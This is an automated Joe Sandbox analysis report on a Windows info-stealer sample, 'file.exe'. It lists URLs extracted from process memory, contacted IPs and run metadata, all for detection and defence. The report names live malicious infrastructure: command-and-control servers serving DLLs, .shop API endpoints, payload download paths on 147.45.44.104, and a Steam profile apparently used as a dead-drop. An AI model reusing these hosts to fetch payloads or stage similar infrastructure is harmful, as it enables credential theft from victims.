0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/sqlp.dllI	RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/sqlp.dllB	RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.211.162/sqlp.dllV	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://s.ytimg.com;	RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	false	Avira URL Cloud: safe	unknown
https://fragnantbui.shop/	RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869.	RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://stogeneratmns.shop/	RegAsm.exe, 00000008.00000002.2501224995.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://cowod.hoptoFIEHJDB	RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	IDHIEB.2.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	IDHIEB.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://5.75.211.162AEBFC	RegAsm.exe, 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	DAAFII.11.dr, GIEHJK.2.dr	false	Avira URL Cloud: safe	unknown
https://stogeneratmns.shop/api1	RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://5.75.211.162a	RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162/g	RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stogeneratmns.shop:443/api	RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	Avira URL Cloud: malware	unknown
https://5.75.211.162/mozglue.dllX	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/L	RegAsm.exe, 00000002.00000002.2452955008.00000000007CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drawzhotdog.shop:443/api:	RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fragnantbui.shop:443/api	RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.211.162/:3#	RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.211.162/freebl3.dlll	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/apiO	RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/I	RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.104	AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://login.steampowered.com/	RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU	RDPWInst.exe, 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	IDHIEB.2.dr	false	Avira URL Cloud: safe	unknown
https://reinforcenh.shop/.itb	RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	76561199780418869[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/	76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
http://hansgborn.eu	AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.1620.5938.132	RegAsm.exe, 0000000B.00000002.2820883103.0000000000563000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	false	URL Reputation: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown
http://api.ipify.orgd	AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hansgborn.eud	AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
8.46.123.33	unknown	United States	62713	AS-PUBMATICUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
172.67.208.139	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true
104.21.4.136	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	ghostreedmnu.shop	European Union	13335	CLOUDFLARENETUS	true
172.67.162.108	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.128.144	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
104.21.36.139	wallkedsleeoi.shop	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519759
Start date and time:	2024-09-27 00:13:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	49
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@63/43@16/14
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 97 Number of non-executed functions: 217
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:14:33	API Interceptor	5x Sleep call for process: RegAsm.exe modified
18:15:35	API Interceptor	1x Sleep call for process: AFHDGDGIID.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
